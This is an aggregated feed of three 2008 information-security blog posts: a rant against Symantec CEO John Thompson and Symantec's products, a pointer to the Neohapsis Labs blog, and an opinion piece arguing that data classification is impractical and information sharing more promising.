Posted: 28 Apr 2008 04:16 PM CDT

John Thompson is an ass.  There, I said it.  Whew…

So now, let me ’splain.   I did not really have an opinion of John Thompson until the 2005 RSA Conference (except for the acquisition of Veritas - it made sense to me, but it royally screwed me over at a critical time - explained below).  I just thought of him as another CEO of a pretty successful security company.  Either he had not done enough to stand out to me, or I simply had not paid attention to him up to that point.  Anyway, I was sitting in the audience at RSA 2005, and I had just finished listening to Bill Gates talking about their entry into security.  Like many people, I met this with apprehension and doubt, but I still listened with respect.  But then Mr. Thompson came up after Bill was done, and that respect factor went right out the window (for Mr. Thompson, that is).  He proceeded to rip Bill Gates up one side and down the other, and it was the single most rude and disrespectful display I have ever seen.

Now don’t get me wrong.  I am not a MSFT fanboy.  I have slammed them on many an occasion.  But what Mr. Thompson did was really beyond just trying to head off a competitor.  It was unprofessional, and it smacked of school-yard bully tactics.  And to add to it, Mr. Thompson had a crew waiting at the doors handing out review forms to see what the audience thought of his little speech.  I gave it negatives across the board, handed it back with a sneer, and then slapped the person who handed it to me (OK, that last part about smacking them was made up… but I DID sneer).

Now he is being downright condescending towards McAfee.  When asked how he felt about them since they are viewed as Symantec’s chief competitor, he said:

It’s a nice little company and they do a nice job. The industry needs competition. But we don’t see their portfolio as competing directly with ours. We help customers manage their infrastructures better.

Dude, come on.  Please get off your friggin’ crystal tower.  You can debate your quality versus their quality if you want, but pitiful statements like that are beyond ridiculousness.  Confidence is needed in a CEO.  Arrogance just looks petty.  Eric Hoffer said, "Rudeness is the weak man’s imitation of strength."  You are looking pretty weak, Mr. Thompson.

BTW, I am not a McAfee fanboy either.  But Mr. Thompson, I have run and managed both your AV products and McAfee AV products in ENTERPRISE settings.  McAfee has ALWAYS beat yours, hands down.  And that is in management, performance, and accuracy.  That is my experience.  And while I have limited experience in some of your other products, I can say that from the outside, your product line looks like a mishmash of crap.

And your acquisition of Veritas way back when?  I was actually one of the few people who thought that acquisition made sense.  But that also hosed me in so many ways.  Like when I was trying to perform my DR test in Arizona.  I’m a big boy, so I take responsibility for that kind of failure.  But horrible support from Veritas / Symantec single-handedly screwed up my DR test.  Support was already bad at Veritas, and you jacked it up even worse.  Great job.

So there’s my rant.  I hope I don’t get sued for libel. :)  BTW, it looks like someone else out there feels the same way I do about Mr. Thompson (though they said it in a nicer way).

Vet

Not enough blogging (or: where to find me) [Episteme: Belief. Knowledge. Wisdom]

Posted: 28 Apr 2008 11:52 AM CDT

I get a hard time for not enough blogging around here. But lately, I’ve been doing much more of my blogging over on my employer’s new blog: The Neohapsis Labs blog. All of the fun stuff in my head that revolves around information security and risk management has been going over there.

I’m especially jazzed by my newest post: Risk and Understanding all of the Variables. I’ve been annoyed of late about the financial newscasters oversimplifying the state of the economy through their use of the Dow Jones, and I finally sat down and did the analysis that I knew would show how misguided that view of risk management is.

Please check it out - it’s a fun one.


Nearly there... [IT Security: The view from here]

Posted: 28 Apr 2008 11:30 AM CDT

I've just finished writing my final post in the series of 'data nirvana' posts - you can read it here tomorrow - and taken a quick look back through the other blogs I enjoy to find Rich talking about data classification being dead. I have to agree. I started writing about this last year and even ranted at someone else about not understanding it properly (which I won't dig up again).

Data classification is the real data nirvana of course, but it really can't be achieved satisfactorily. To echo Mr. Mogull for a moment, a network is a dynamic thing; it's constantly being updated with information, which can change its status from Top Secret to Private, or Public to Classified in a stroke. Tags just don't cut it. A company I spoke to at length last year proposes a data classification solution. They haven't pushed it as such yet because the market isn't there. A few tyre kickers have had a go, not because they want to classify their data, but because they want to find it. That's a totally different matter. De-duplication is a very good idea, and simple, and sellable. Data classification is a great idea, but complex and completely un-sellable to anyone except me and Rich. [If you manage to invent it, please drop us a line.]

The only way you could manage to classify a system is to close it: make it read-only, or take it off-line as Rich also talks about. That kind of makes technology about as useful as your local library, though, and sends us crashing back into the 20th century just as everyone is getting used to the 21st. Something I find much more interesting is the idea of controlling information from a central hub, with policies in place around it - information sharing. It's more of a 'real world' example of how people are likely to use data security.

It reduces the need for classification as you only have to choose policies around the data you are making available outside your network. I also talked about this last year, as Microsoft released their SISA idea with about 10 other companies involved. This is clearly a good idea, but with so many technologies involved, bound for disaster. I don't know if anyone got anywhere close to deploying this, but I rather think not.

So Information Sharing is my new proxy-nirvana, or pseudo-nirvana, that is, the thing that will sell and be used, and is actually practical and possible. And guess what, I just happen to have written something about it in my post tomorrow... read on.
